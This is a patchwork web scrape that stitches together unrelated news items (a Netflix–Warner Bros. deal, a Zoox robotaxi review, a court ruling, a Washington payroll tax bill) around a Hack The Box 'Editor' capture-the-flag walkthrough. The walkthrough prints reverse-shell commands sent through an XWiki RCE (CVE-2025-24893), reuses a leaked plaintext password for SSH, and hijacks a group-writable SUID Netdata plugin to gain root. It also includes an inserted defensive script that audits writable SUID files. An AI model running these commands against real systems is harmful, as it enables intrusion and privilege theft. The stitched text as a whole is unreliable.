[joppedc] wrote in to let us know that the Formula 1® season is coming to an end, and that the final race should be bangin’. To get ready, he built this ultra-sleek logo light box last week that does more than just sit there looking good, although it does that pretty well. This light box reacts to live race events, flashing yellow for safety cars, red for red flags, and green for, well, green flags.
The excellent light box itself was modeled in Fusion 360, and the files are available on MakerWorld. The design is split into four parts — the main body, a backplate to mount the LEDs, the translucent front plate, and an enclosure for an ESP32.
Doing it this way allowed [joppedc] to not only print in manageable pieces, it also allowed him to use different materials. Getting the front panel to diffuse light correctly took some experimenting to find the right thickness. Eventually, [joppedc] landed on 0.4 mm (two layers) of matte white PLA.
There isn’t much in the way of brains behind this beauty, just an ESP32, a strip of WS2812B addressable LEDs, and a USB-C port for power. But it’s the software stack that ties everything together. The ESP32 has WLED, Home Assistant runs the show, and of course, there is the F1 sensor integration to get live race data.
It’s only been a day since Netflix announced an $82.7 billion deal to acquire Warner Bros., and the acquisition has already been described as sending Hollywood into “full-blown panic mode,” “possibly a death blow to theatrical filmmaking,” and maybe even “the end of Hollywood” itself.
Amazon is experimenting again. This week on the GeekWire Podcast, we dig into our scoop on Amazon Now, the company’s new ultrafast delivery service. Plus, we recap the GeekWire team’s ride in a Zoox robotaxi on the Las Vegas Strip during Amazon Web Services re:Invent.
In our featured interview from the expo hall, AWS Senior Vice President Colleen Aubrey discusses Amazon’s push into applied AI, why the company sees AI agents as “teammates,” and how her team is rethinking product development in the age of agentic coding.
In this write-up, we will explore the “Editor” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Editor” machine from Hack The Box by achieving the following objectives:
User Flag:
Initial enumeration identifies an XWiki service on port 8080. The footer reveals the exact version, which is vulnerable to an unauthenticated Solr RCE (CVE-2025-24893). Running a public proof of concept provides a reverse shell as the xwiki service account. Exploring the installation directory reveals the hibernate.cfg.xml file, where plaintext database credentials are stored. These credentials are valid for the local user oliver as well. Using them for SSH access grants a stable shell as oliver, which makes it possible to read the user flag.
Root Flag:
Several plugin files are owned by root, set as SUID, and still group-writable. Since oliver belongs to the netdata group, these files can be modified directly. Additionally, this access allows a small SUID helper to be compiled and uploaded, which is then used to overwrite the ndsudo plugin. Afterwards, Netdata executes this plugin with root privileges during normal operation, and therefore, the replacement immediately forces the service to run the injected payload.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Port 22 (SSH): OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 – standard secure shell service for remote access.
Port 80 (HTTP): nginx 1.18.0 (Ubuntu) – web server acting as reverse proxy, redirects to http://editor.htb/.
Port 8080 (HTTP): Jetty 10.0.20 running XWiki – main application with WebDAV enabled, missing HttpOnly on JSESSIONID, and robots.txt exposing edit/save/delete paths.
What is XWiki?
XWiki is a free, open-source enterprise wiki platform written in Java. Think of it as a super-powered Wikipedia-style software that companies or teams install on their own servers to create internal knowledge bases, documentation sites, collaborative portals, etc.
Web Enumeration:
Web Application Exploration:
Perform web enumeration to discover potentially exploitable directories and files.
Landing on http://editor.htb, we’re greeted by the homepage of “SimplistCode Pro” – a sleek, modern web-based code editor that looks almost identical to VS Code, complete with Ace Editor, file tree, and integrated terminal.
Accessing http://10.10.11.180:8080/xwiki/bin/view/Main/ reveals the built-in XWiki documentation page for SimplistCode Pro – confirming the actual editor runs on an XWiki instance at port 8080.
After discovering that the web service on port 8080 is an XWiki instance and confirming the exact version 15.10.8 from the footer banner, we immediately searched for public exploits.
CVE-2025-24893: Unauthenticated Remote Code Execution in XWiki Platform
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform, an open-source enterprise wiki software. It allows any guest user (no login required) to execute arbitrary Groovy code on the server by sending a specially crafted request to the SolrSearch macro. This flaw stems from improper sandboxing and sanitisation of Groovy expressions in asynchronous macro rendering, enabling attackers to inject and execute malicious code via search parameters.
This version is vulnerable to CVE-2025-24893 – an unauthenticated Remote Code Execution in the Solr search component via malicious Groovy templates.
Testing the exploit syntax first – the script help shows mandatory flags -t (target URL) and -c (command).
Setting up our listener with nc -lvnp 9007 to catch the reverse shell.
We launch the exploit with a bash reverse shell as the command: python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c 'bash -c "bash -i >/dev/tcp/10.10.14.189/9007 0>&1"' -e /bin/bash
Unfortunately, this attempt failed to pop a shell: no connection came back to our listener. Time to pivot and hunt for another path.
With a busybox payload, the exploit worked perfectly! Final command that popped the shell: python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.14.189 9007 -e /bin/bash'. The script injected Groovy code via the vulnerable Solr search endpoint, executed busybox nc … -e /bin/bash, and gave us our reverse shell as the xwiki system user.
Achieving Initial Foothold as xwiki User on Editor machine via CVE-2025-24893
Back on our attacker box, we fire up nc -lvnp 9007. Moments later, the listener catches a connection from 10.10.11.80:59508. Running id confirms we successfully landed as xwiki (uid=997) – the exact user running the XWiki Jetty instance. Initial foothold achieved!
The shell is raw and non-interactive. We immediately stabilize it: which python3 → /usr/bin/python3, then python3 -c 'import pty;pty.spawn("/bin/bash")'. The prompt changes to xwiki@editor:/usr/lib/xwiki-jetty$ – full TTY achieved, background color and everything.
Inside the limited shell as xwiki@editor, we see another user home directory called oliver. Attempting cd oliver instantly fails with Permission denied – no direct access yet, but we now know the real target user is oliver.
Quick enumeration with find / -name "xwiki" 2>/dev/null reveals all XWiki-related paths (config, data store, logs, webapps, etc.). This confirms we're deep inside the actual XWiki installation running under Jetty.
ls in the same directory reveals the classic XWiki/Jetty config files, including the juicy hibernate.cfg.xml – this file almost always contains plaintext database credentials.
hibernate.cfg.xml credential reuse on editor machine
Full cat hibernate.cfg.xml confirms this is the real DB password used by the application. Classic misconfiguration: developers reuse the same password for the DB user and the system user oliver.
cat hibernate.cfg.xml | grep password instantly dumps multiple entries, and the first one is: theEd1t0rTeam99 Bingo – plaintext password for the XWiki database (and very often reused elsewhere).
While poking around /usr/lib/xwiki/WEB-INF/, we try su oliver and blindly guess the password theEd1t0rTeam99 (common pattern on HTB). It fails with an Authentication failure – wrong password, but we now know the exact target user is Oliver.
Attempting to SSH directly as xwiki@editor.htb results in “Permission denied, please try again.” (twice). Attackers cannot log in via password-based SSH because the xwiki system account lacks a valid password (a common setup for service accounts). We can only interact with the XWiki user via the reverse shell we already have from the CVE exploit. No direct SSH access here.
SSH as oliver
From our attacker box we can now SSH directly as oliver (optional, cleaner shell): ssh oliver@editor.htb → password theEd1t0rTeam99 → clean login
User flag successfully grabbed! We’re officially the oliver user and one step closer to root.
Escalate to Root Privileges Access on the Editor machine
Privilege Escalation:
Checking sudo first, the response is "Sorry, user oliver may not run sudo on editor." No passwordless sudo, no obvious entry in /etc/sudoers.
Only oliver’s normal processes visible: systemd user instance and our own bash/ps. No weird cronjobs, no suspicious parent processes. Confirms we need a deeper, non-obvious privesc vector.
After stabilising our shell as oliver, we immediately start hunting for privilege-escalation vectors. First, we run find / -perm 4000 2>/dev/null to enumerate SUID binaries – the output returns nothing interesting, instantly ruling out the classic GTFOBins path. To be thorough, we double-check find / -user root -perm 4000 2>/dev/null in case any root-owned SUIDs were missed, but the result is the same: no promising binaries. Straight-up SUID exploitation is off the table, so we pivot to deeper enumeration with LinPEAS and other techniques. Root will require a less obvious vector.
Linpeas Enumeration
Downloading LinPEAS into /dev/shm (tmpfs, stays hidden and writable).
As oliver, we fire up LinPEAS in /dev/shm: ./linpeas.sh. The legendary green ASCII art confirms it’s running and scanning.
LinPEAS lights up the intended privesc path in bright red: a whole directory of Netdata plugins under /opt/netdata/usr/libexec/netdata/plugins.d/ are owned by root, belong to the netdata group, have the SUID bit set, and are writable by the group. Since groups oliver shows we’re in the netdata group, we can overwrite any of these binaries with our own malicious payload and instantly get a root shell the next time Netdata executes the plugin (which happens automatically every few seconds). Classic Netdata SUID misconfiguration, game over for root.
The key section “Files with Interesting Permissions” + “SUID – Check easy privesc” shows multiple Netdata plugins (like go.d.plugin, ndsudo, network-viewer.plugin, etc.) owned by root but executable/writable by the netdata group or others. Classic Netdata misconfiguration on HTB boxes.
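The condition LinPEAS flags here, set-ID files that a non-owner group can write, can be audited for directly. The script below is an added example, not part of the original walkthrough; the function names and the fixture files are made up for illustration. It also shows why the search pattern matters: find's -perm -4000 matches any file with the SUID bit set, whereas -perm 4000 matches only a mode of exactly 4000.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit a tree for SUID/SGID files
# that group or other users can modify, then remove that write access.

# scan_setid ROOT [find-action...]
# Selects regular files that have a set-ID bit AND a group/other write bit.
# Only POSIX "-perm -mode" tests are used ("all of these bits are set").
scan_setid() {
    root=$1; shift
    [ $# -gt 0 ] || set -- -print
    find "$root" -xdev -type f \
        \( -perm -4000 -o -perm -2000 \) \
        \( -perm -0020 -o -perm -0002 \) \
        "$@" 2>/dev/null
}

# Report findings, one path per line, sorted for stable output.
find_writable_setid() {
    scan_setid "$1" -print | sort
}

# For comparison: exact-mode match. A file with mode 4770 is NOT matched,
# because "-perm 4000" means "mode is exactly 4000".
find_exact_4000() {
    find "$1" -xdev -type f -perm 4000 -print 2>/dev/null | sort
}

# Remediation: strip group/other write from every finding.
# The set-ID bit and ownership are left untouched.
harden_setid() {
    scan_setid "$1" -exec chmod go-w {} +
}

# Constructed fixture so the script runs anywhere without root.
make_fixture() {
    d=$(mktemp -d) || return 1
    : > "$d/plugin_a"; chmod 4770 "$d/plugin_a"  # SUID + group-writable: finding
    : > "$d/plugin_b"; chmod 4750 "$d/plugin_b"  # SUID, not group-writable: fine
    : > "$d/notes";    chmod 0664 "$d/notes"     # writable, no set-ID bit: fine
    printf '%s\n' "$d"
}

# Demo on the fixture. On a real host, point it at the directory of interest,
# e.g. find_writable_setid /opt/netdata/usr/libexec/netdata/plugins.d
demo_dir=$(make_fixture)
echo "writable set-ID files:"
find_writable_setid "$demo_dir"
echo "matches for exact mode 4000: $(find_exact_4000 "$demo_dir" | wc -l)"
harden_setid "$demo_dir"
echo "after hardening: $(find_writable_setid "$demo_dir" | wc -l) finding(s)"
rm -rf "$demo_dir"
```

Run as root on a real system so the scan can descend into every directory; review the findings before calling harden_setid.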
Compiled locally with gcc dark.c -o nvme, this will be uploaded and used to overwrite one of the writable Netdata SUID plugins.
Why nvme?
We compile our SUID shell as nvme to specifically target the Netdata plugin ndsudo at /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo. This file is root-owned, SUID, belongs to the netdata group, and is group-writable. Since oliver is in the netdata group, we can overwrite it directly. Netdata periodically runs ndsudo as root, so replacing it with our payload triggers an instant root shell. The name nvme is short, harmless-looking, and doesn’t clash with real system binaries, making it the perfect stealthy replacement. Upload → overwrite ndsudo → wait a few seconds → root. Simple and deadly effective.
curl our compiled nvme from the attacker machine → download complete
chmod +x nvme → make it executable. Temporarily prepend /dev/shm to PATH so we can test it locally.
When testing our malicious nvme binary with the existing ndsudo plugin (/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list), it fails with “nvme : not available in PATH.” This is expected because we haven’t overwritten ndsudo yet—it’s still the original binary, and our nvme isn’t in the PATH for this test command. It’s a quick sanity check to confirm the setup before the real overwrite. Next, we’ll copy nvme directly over ndsudo to hijack it.
An ls in /dev/shm now shows nvme is missing — we already moved or deleted it during testing. No problem: we just re-download it with curl nvme, chmod +x nvme, and we’re back in business, ready for the final overwrite of ndsudo. Payload restored, stealth intact.
We re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list.
Root flag captured! With the Netdata plugin overwritten and triggered, we’ve spawned our SUID shell as root. Machine fully owned.
This was another busy week in the Linux ecosystem and wider FOSS community, with an update on the way for Linux Mint, growing Steam marketshare, and much more. Here are the biggest stories you might have missed.
A three-judge panel ruled Friday that President Donald Trump’s firings without cause of Cathy Harris and Gwynne Wilcox, Democratic members on the Merit Systems Protection Board and the National Labor Relations Board, were lawful.
The split 2-to-1 panel decision of the D.C. Circuit Court of Appeals has no immediate effect, since both Harris and Wilcox’s firings were finalized in May. But Friday’s ruling comes as the Supreme Court is expected to soon hear arguments on whether to overturn a 90-year-old ruling known as Humphrey’s Executor — a decision that could expand Trump’s power to shape independent agencies.
In the 1935 Supreme Court ruling on Humphrey’s Executor, the justices unanimously found that commissioners can be removed only for misconduct or neglect of duty, effectively limiting when presidents can fire board members.
But when Judges Gregory Katsas and Justin Walker ruled Friday in favor of Trump’s firings of Harris and Wilcox, they argued that MSPB and NLRB fall outside the limitations stemming from Humphrey’s Executor, and that the president can still “remove principal officers who wield substantial executive power.”
“The NLRB and MSPB wield substantial powers that are both executive in nature and different from the powers that Humphrey’s Executor deemed to be merely quasi-legislative or quasi-judicial,” the judges wrote. “So, Congress cannot restrict the President’s ability to remove NLRB or MSPB members.”
Judge Florence Pan, the dissenting panel member and a Biden appointee, argued that the two agencies do fall under the scope of Humphrey’s Executor, and that maintaining the independence of MSPB and NLRB is critical. She wrote that the Trump administration’s “extreme view of executive power sharply departs from precedent.”
“We may soon be living in a world in which every hiring decision and action by any government agency will be influenced by politics, with little regard for subject-matter expertise, the public good, and merit-based decision-making,” she wrote.
The MSPB is an independent agency responsible for adjudicating appeals from federal employees who allege prohibited personnel practices by their agencies. The NLRB investigates unfair labor practices in the private sector and oversees union elections. Both boards are typically composed of members of both political parties.
Trump fired both Wilcox and Harris within his first few weeks in office, but did not point to a specific reason for the terminations. Wilcox and Harris, both of whom were Democratic board members, sued the president over their removals, arguing that they are protected by a federal law meant to ensure MSPB and NLRB’s independence from political considerations — and that the president can only remove them “for inefficiency, neglect of duty, or malfeasance in office.”
Though a federal judge initially ruled the two terminations were unlawful, the Supreme Court reversed that decision in May, effectively green-lighting the finalization of the board members’ firings earlier this year.
In its May decision, the Supreme Court indicated that it was likely “that both the NLRB and MSPB exercise considerable executive power,” which it said would make restrictions on the president’s ability to fire them unconstitutional. Friday’s panel ruling aligns with the Supreme Court’s initial arguments.
The Supreme Court is expected to hear arguments Monday on Trump’s firing of Rebecca Slaughter, a Democratic member of the Federal Trade Commission — a case that may further influence the outcome of both Harris and Wilcox’s terminations.
This holiday season will be a cold one, but AmeriCannaRx is helping you and yours stay warm with hot deals all December long. They are offering a gigantic 60% off discount on select products throughout the end of the year, so you’ll have more than enough to stuff your stocking. They’ll even price match any […]
Chinese-sponsored groups are using the popular Brickstorm backdoor to access and gain persistence in government and tech firm networks, part of the ongoing effort by the PRC to establish long-term footholds in agency and critical infrastructure IT environments, according to a report by U.S. and Canadian security offices.
The bidding war is over, and Netflix has been declared the winner.
After flirting with Paramount Skydance and Comcast, Warner Bros. Discovery (WBD) has decided to sell its streaming and movie studios business to Netflix. If approved, the deal is set to overturn the media landscape and create ripples that will affect Hollywood for years.
$72 billion acquisition
Netflix will pay an equity value of $72 billion, or an approximate total enterprise value of $82.7 billion, for Warner Bros. All of WBD has a $60 billion market value, NBC News notes.
Members of GeekWire’s team in Las Vegas posing for a selfie after taking Amazon’s Zoox robotaxis for a spin in Las Vegas, L-R: Brian Westbrook, Todd Bishop, Steph Stricklen, Holly Grambihler (front), and Jessica Reeves (right).
LAS VEGAS — Our toaster has arrived.
Amazon’s Zoox robotaxi service launched in Las Vegas this fall, and a few members of the hard-working GeekWire Studios crew joined me to try it out for a ride to dinner after a long day at AWS re:Invent. Zoox was nothing short of a hit with our group.
The consensus: it was a smooth, futuristic shuttle ride that felt safe amid the Las Vegas chaos, with per-seat climate control, and customizable music. (Somehow we landed on Cher, but in this vehicle, we felt no need to turn back time.) Most of all, the face-to-face seating made for a fun group experience, rather than a retrofitted car like Waymo.
Zoox, founded in 2014, was acquired by Amazon in 2020 for just over $1 billion, marking the tech giant’s move into autonomous vehicle technology and urban mobility. Zoox operates as an independent subsidiary, based in Foster City, Calif.
Unlike competitors that retrofit vehicles, Zoox designed its robotaxi from scratch. It’s a compact, 12-foot-long electric pod, bidirectional, without steering wheel or pedals.
The experience of calling the Zoox vehicle on the app was seamless and quick. The doors opened via a button in the app after the carriage arrived to pick us up at a designated station between Fashion Show Mall and Trump International Hotel.
Inside, our nighttime ride featured a starfield display on the interior ceiling of the cab, adding to the magical feel, with functional seats comfortable enough for a drive across the city.
Jessica Reeves, left, and Steph Stricklen check out the interior of the Zoox carriage. (GeekWire Photo / Brian Westbrook)
A few of us had experienced Waymo in California, so it was natural to make the comparison. One thing I missed was the live virtual road view that Waymo provides, representing surrounding vehicles and roadways, which provides some reassurance.
Emergency human assistance also seemed more accessible in the Waymo vehicles than in the Zoox carriage. And unlike the Waymo Jaguar cars that I’ve taken in San Francisco, the build quality of the Zoox vehicle felt more utilitarian than luxury.
For this current phase of the Vegas rollout, one major downside is the limited service area — just seven fixed spots along the Las Vegas strip, like Resorts World, Luxor, and AREA15, requiring walks between hubs rather than seamless point-to-point hails. It’s more of a novelty for that reason, rather than a reliable form of transportation.
But hey, the rides are free for now, so it’s hard to complain.
And the ability to sit across from each other more than made up for any minor quibbles. (Our group of five split up and took two four-person carriages from Fashion Show Mall to Resorts World.) Compared to the Waymo experience, the Zoox vehicle feels less like sitting in a car and more like sharing a moving living room.
GeekWire Studios host Steph Stricklen was initially skeptical — wondering if Vegas would be the right place for an autonomous vehicle, given the chaotic backdrop and unpredictable traffic patterns on the Strip. But she walked away a believer, giving the ride a “10 out of 10” and saying she never felt unsafe as a passenger.
“It felt very Disneyland,” said GeekWire Studios host Brian Westbrook, citing the creature comforts such as climate control that seemed to be isolated to each seat. Along with music and other controls, that’s one of the features that can be accessed via small touch-screen displays for each passenger on the interior panel of the vehicle.
GeekWire project manager Jessica Reeves said she almost forgot that there wasn’t a human driving. Despite rapid acceleration at times, the ride was smooth.
“It didn’t feel like I was riding in an autonomous vehicle, maybe it was just the buzz of experiencing this new way of transportation,” Jessica messaged me afterward, reflecting on the experience. “The spaciousness, facing my friends, exploring the different features, it all happened so fast that before I knew it, we were there!”
Holly Grambihler, GeekWire’s chief sales and marketing officer, was impressed with the clean interior and comfortable seats.
“It felt less like a vehicle and more like a mobile karaoke studio with the customized climate control and ability to choose your music — Cher in Vegas, perfect!” Holly said. “It felt safe with our short ride. I don’t think I’d take a Zoox on a freeway yet.”
On that point: Zoox’s purpose-built pod is engineered to reach highway speeds of up to about 75 mph, and the company has tested it at those velocities on closed tracks. In Las Vegas, though, the robotaxis currently stick to surface streets at lower speeds, and Zoox hasn’t yet started mixing into freeway traffic.
The Zoox station outside Resorts World Las Vegas. (GeekWire Photo / Brian Westbrook)
The Vegas service launch marked Zoox’s first public robotaxi deployment, offering free rides along a fixed loop on and around the Strip while gathering data for paid trips. Zoox followed with a limited public launch in San Francisco in November.
For Amazon, the technology represents a long-term bet, with the potential to contribute to its logistics operations. It’s not hard to imagine similar vehicles shuttling packages in the future. But for now the focus is on public ridership.
The company has flagged Austin, Miami, Los Angeles, Atlanta, Washington, D.C., and Seattle as longer-term potential markets for the robotaxi service as regulations and technology mature. We’ve contacted Zoox for the latest update on its plans.
If our own ride this week was any indication, the company’s biggest challenge may simply be expanding the robotaxi service fast enough for more people to try it.
Editor’s note: GeekWire Studios is the content production arm of GeekWire, creating sponsored videos, podcasts, and other paid projects for a variety of companies and organizations, separate from GeekWire’s independent news coverage. GeekWire Studios had a booth at re:Invent, recording segments with Amazon partners in partnership with AWS. Learn more about GeekWire Studios.
Scrolling through Netflix's vast anime titles can feel like a daunting task, especially if you're like me and not knee-deep in the genre. The streaming service makes it easy to delve into classic and newer episodic series and movies, and you're sure to find something you like.
A newly proposed payroll tax would add new costs for large businesses in Washington state. But Rep. Shaun Scott, a Seattle Democrat sponsoring the bill, argues it would protect the basic services that help companies recruit and retain talent.
“People are looking to the state legislature for leadership on protecting the programs that make our state actually a healthy climate to do business in,” Scott told GeekWire this week.
House Bill 2100, pre-filed this week in Olympia, would create the “Well Washington Fund” and levy a 5% payroll expense tax on “large operating companies” for employee wages above a $125,000 threshold. The bill defines a “large operating company” as one with more than 20 employees and more than $5 million in gross receipts or sales, among other criteria. Employers with total employee wages under $7 million in the prior year would be exempt.
Scott is pitching the bill as a state backstop against federal cuts hitting Medicaid, higher education, housing and other programs. He said it would generate more than $2 billion annually and impact about 4,300 businesses — including Redmond, Wash.-based tech giant Microsoft and telecom behemoth T-Mobile, headquartered in Bellevue.
Seattle-based companies such as Amazon that already pay the city’s JumpStart payroll tax would be exempt.
Scott said there is a “corollary effect” on corporations from policies that benefit “everyday people.”
“My sense of it is that the public is on our side on this issue,” he said. “They understand that when you have very well-funded higher education, what that means is a well-trained workforce that could seek employment at a place like Microsoft or Amazon — and the company would benefit as a result.”
“When you have people who have very good housing options, that makes Washington that much more of a competitive place to come and do business,” he added.
Business groups are wary of the proposal. Rachel Smith, the new CEO of Washington Roundtable, called it a “tax-first, plan later” idea. She also cited the state’s recent tax increases impacting businesses — passed in part to help address a $16 billion budget shortfall — and broader economic uncertainty.
Washington Roundtable CEO Rachel Smith. (Washington Roundtable Photo)
“If a job is cheaper somewhere else, and a company has an operational environment that allows them to deploy that job somewhere else, of course that’s going to be something they consider,” Smith said in an interview with GeekWire.
Lawmakers tried to pass a similar statewide payroll tax this year, but the bill did not advance. In March, Microsoft President Brad Smith criticized that tax proposal and said it would increase prices for consumers, reduce jobs, and hurt the tech industry.
Microsoft declined to comment on Rep. Scott’s proposal when contacted by GeekWire this week.
Rep. Scott said it’s “disingenuous” that critics raise alarms about companies leaving when the state talks about funding the safety net, but don’t ask similar questions when companies cut jobs on their own. He said the relocation question “does not come up when we see large tech firms investing in artificial intelligence, which is designed to divest from human labor.”
Washington is one of a few states without a personal or corporate income tax. Most state revenue comes from sales, property, and B&O taxes — a system critics say disproportionately burdens lower-income residents.
Gabriella Buono, interim president and CEO at the Seattle Metro Chamber, said that “raising taxes in an affordability crisis will mean higher prices on everyday essentials, fewer job opportunities, and more closures in sectors that are already on the edge.”
“Voters across the political spectrum are clear: they want smart spending, transparency, and results, not new taxes that make it harder to live and work in this state,” Buono said in a statement.
Revenue from the proposed bill would initially go to the state general fund in 2026, then split beginning in 2027, with 51% directed to a dedicated Well Washington fund account and 49% to the general fund. A new oversight and accountability board would guide priorities and report annually. Spending from the account would be limited to higher education, health care — especially Medicaid — cash assistance, and energy and housing programs.
Demogorgons are cool and all, but sometimes the best stories on Netflix aren't the scripted ones. I love delving into a good documentary because they offer glimpses down the rabbit hole of odd and fascinating topics you never knew existed, as well as unprecedented access behind the scenes of some of the world's highest profile people and their lives.
For too long, security has been cast as a bottleneck – swooping in after developers build and engineers test to slow things down. The reality is blunt; if it’s bolted on, you’ve already lost. The ones that win make security part of every decision, from the first line of code to the last boardroom conversation...